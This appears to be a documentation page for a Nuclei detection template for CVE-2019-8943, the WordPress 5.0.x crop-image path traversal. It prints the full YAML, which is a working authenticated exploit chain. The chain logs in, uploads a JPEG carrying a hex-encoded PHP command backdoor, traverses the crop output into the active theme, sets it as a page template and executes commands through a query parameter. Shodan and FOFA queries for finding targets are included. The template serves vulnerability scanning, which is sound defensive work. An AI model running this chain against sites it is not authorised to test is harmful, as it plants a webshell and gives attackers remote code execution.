WordPress Core 5.0.0 - Crop-image Shell Upload
ID: CVE-2019-8943
Severity: medium
Author: sttlr
Tags: cve,cve2019,wordpress,rce,intrusive,authenticated,packetstorm,wp-theme
Description
Section titled “Description”WordPress through 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring.
YAML Source
Section titled “YAML Source”id: CVE-2019-8943
info: name: WordPress Core 5.0.0 - Crop-image Shell Upload author: sttlr severity: medium description: | WordPress through 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring. reference: - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/ - http://packetstormsecurity.com/files/152396/WordPress-5.0.0-crop-image-Shell-Upload.html - http://packetstormsecurity.com/files/161213/WordPress-5.0.0-Remote-Code-Execution.html - http://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce - https://tryhackme.com/r/room/blog classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N cvss-score: 6.5 cve-id: CVE-2019-8943 cwe-id: CWE-22 epss-score: 0.92778 epss-percentile: 0.99097 cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: verified: true vendor: wordpress product: wordpress shodan-query: - http.component:"wordpress" - cpe:"cpe:2.3:a:wordpress:wordpress" fofa-query: body="oembed" && body="wp-" tags: cve,cve2019,wordpress,rce,intrusive,authenticated,packetstorm,wp-theme
variables: image_filename: "{{rand_text_alpha(10)}}" string: "{{to_lower(rand_text_alpha(5))}}"
flow: http(1) && http(2) && (http(3) || http(4)) && http(5) && http(6) && http(7) && http(8) && http(9) && http(10) && http(11) && http(12) && http(13) && http(14) && http(15) && http(16)
http: - raw: - | GET /wp-login.php HTTP/1.1 Host: {{Hostname}}
matchers: - type: word words: - "WordPress</title>" - '/wp-login.php?action=lostpassword">Lost your password?</a>' - '<form name="loginform" id="loginform" action="{{BaseURL}}/wp-login.php" method="post">' condition: or internal: true
- raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Login
matchers: - type: dsl dsl: - 'contains_all(header,"wordpress_logged_in","/wp-admin")' - 'status_code == 302' condition: and internal: true
- raw: - | GET /wp-content/themes/{{theme_name}}/style.css HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - "status_code == 200" - "len(body) > 0" - "content_type == 'text/css'" condition: and internal: true
- raw: - | GET / HTTP/1.1 Host: {{Hostname}}
extractors: - type: regex name: theme_name group: 1 regex: - "/wp-content/themes/([^/]+)/" internal: true
- raw: - | GET /wp-admin/media-new.php HTTP/1.1 Host: {{Hostname}}
extractors: - type: xpath name: wpnonce attribute: value xpath: - "//input[@id='_wpnonce'][1]" internal: true
- raw: - | POST /wp-admin/async-upload.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=rexvfybxrhgfrfrjv
--rexvfybxrhgfrfrjv Content-Disposition: form-data; name="name"
{{image_filename}}.jpg --rexvfybxrhgfrfrjv Content-Disposition: form-data; name="action"
upload-attachment --rexvfybxrhgfrfrjv Content-Disposition: form-data; name="_wpnonce"
{{wpnonce}} --rexvfybxrhgfrfrjv Content-Disposition: form-data; name="async-upload"; filename="{{image_filename}}.jpg" Content-Type: image/jpeg
{{hex_decode("ffd8ffe000104a46494600010101006000600000ffed003850686f746f73686f7020332e30003842494d040400000000001c1c027400103c3f3d60245f4745545b305d603b3f3e1c020000020004fffe003b43524541544f523a2067642d6a7065672076312e3020287573696e6720494a47204a50454720763830292c207175616c697479203d2038320affdb0043000604040504040605050506060607090e0909080809120d0d0a0e1512161615121414171a211c17181f1914141d271d1f2223252525161c292c28242b21242524ffdb00430106060609080911090911241814182424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424ffc000110800c0010603012200021101031101ffc4001f0000010501010101010100000000000000000102030405060708090a0bffc400b5100002010303020403050504040000017d01020300041105122131410613516107227114328191a1082342b1c11552d1f02433627282090a161718191a25262728292a3435363738393a434445464748494a535455565758595a636465666768696a737475767778797a838485868788898a92939495969798999aa2a3a4a5a6a7a8a9aab2b3b4b5b6b7b8b9bac2c3c4c5c6c7c8c9cad2d3d4d5d6d7d8d9dae1e2e3e4e5e6e7e8e9eaf1f2f3f4f5f6f7f8f9faffc4001f0100030101010101010101010000000000000102030405060708090a0bffc400b51100020102040403040705040400010277000102031104052131061241510761711322328108144291a1b1c109233352f0156272d10a162434e125f11718191a262728292a35363738393a434445464748494a535455565758595a636465666768696a737475767778797a82838485868788898a92939495969798999aa2a3a4a5a6a7a8a9aab2b3b4b5b6b7b8b9bac2c3c4c5c6c7c8c9cad2d3d4d5d6d7d8d9dae2e3e4e5e6e7e8e9eaf2f3f4f5f6f7f8f9faffda000c03010002110311003f003c3f3d60245f4745545b305d603b3f3e")}} --rexvfybxrhgfrfrjv--
extractors: - type: json part: body name: image_id json: - ".data.id" internal: true
- type: json part: body name: update_nonce json: - ".data.nonces.update" internal: true
- type: json part: body name: filename json: - ".data.filename" internal: true
- raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
action=query-attachments&post_id=0&query%5bitem%5d=43&query%5borderby%5d=date&query%5border%5d=DESC&query%5bposts_per_page%5d=40&query%5bpaged%5d=1
extractors: - type: json part: body name: ajax_nonce json: - ".data[0].nonces.edit" internal: true
- raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
action=image-editor&_ajax_nonce={{ajax_nonce}}&postid={{image_id}}&history=%5b%7b%22c%22%3a%7b%22x%22%3a0%2c%22y%22%3a0%2c%22w%22%3a400%2c%22h%22%3a300%7d%7d%5d&target=all&context=&do=save
extractors: - type: regex name: image_filename part: body group: 1 regex: - '\/([^\/]+-e\d+)-' internal: true
- raw: - | POST /wp-admin/post.php?post={{image_id}}&action=edit HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
extractors: - type: xpath name: wpnonce2 attribute: value xpath: - "//input[@id='_wpnonce'][1]" internal: true
- raw: - | POST /wp-admin/post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
_wpnonce={{wpnonce2}}&action=editpost&post_ID={{image_id}}&meta_input%5b_wp_attached_file%5d={{date_time('%Y/%M')}}/{{image_filename}}.jpg%3f/x
matchers: - type: status status: - 302 internal: true
- raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
action=crop-image&_ajax_nonce={{ajax_nonce}}&id={{image_id}}&cropDetails%5bx1%5d=0&cropDetails%5by1%5d=0&cropDetails%5bwidth%5d=400&cropDetails%5bheight%5d=300&cropDetails%5bdst_width%5d=400&cropDetails%5bdst_height%5d=300
extractors: - type: json part: body json: - ".data.filename" internal: true
- raw: - | POST /wp-admin/post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
_wpnonce={{wpnonce2}}&action=editpost&post_ID={{image_id}}&meta_input%5b_wp_attached_file%5d={{date_time('%Y/%M')}}/{{image_filename}}.jpg%3f/../../../../themes/{{theme_name}}/{{randstr}}
matchers: - type: status status: - 302 internal: true
- raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
action=crop-image&_ajax_nonce={{ajax_nonce}}&id={{image_id}}&cropDetails%5bx1%5d=0&cropDetails%5by1%5d=0&cropDetails%5bwidth%5d=400&cropDetails%5bheight%5d=300&cropDetails%5bdst_width%5d=400&cropDetails%5bdst_height%5d=300
extractors: - type: json part: body name: cropped_image_filename json: - ".data.filename" internal: true
- raw: - | POST /wp-admin/post-new.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
extractors: - type: xpath name: wpnonce3 attribute: value xpath: - "//input[@id='_wpnonce'][1]" internal: true
- type: regex name: post_id part: body group: 1 regex: - '"post":{"id":(\w+),' internal: true
- raw: - | POST /wp-admin/post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
_wpnonce={{wpnonce3}}&action=editpost&post_ID={{post_id}}&post_title={{rand_text_alpha(10)}}&post_name={{rand_text_alpha(10)}}&meta_input%5b_wp_page_template%5d=cropped-{{randstr}}.jpg
matchers: - type: status status: - 302 internal: true
- method: GET path: - "{{BaseURL}}/?p={{post_id}}&0=echo+{{base64(string)}}|base64+-d" - "{{BaseURL}}/?p={{post_id}}&0=type+C:\\windows\\win.ini" - "{{BaseURL}}/?p={{post_id}}&0=type+..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini"
stop-at-first-match: true
matchers: - type: word part: body words: - "{{string}}" - "for 16-bit app support" condition: or# digest: 4b0a00483046022100bb85fd3366a32837bd7895a144bf11506c309da6d5fd5895c5df50d158a473a1022100e3eaadb80c72ccdf2c7fcd7adf0e0c1a90fa5872e258eb11fccfb559a6b3e4f6:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-8943.yaml"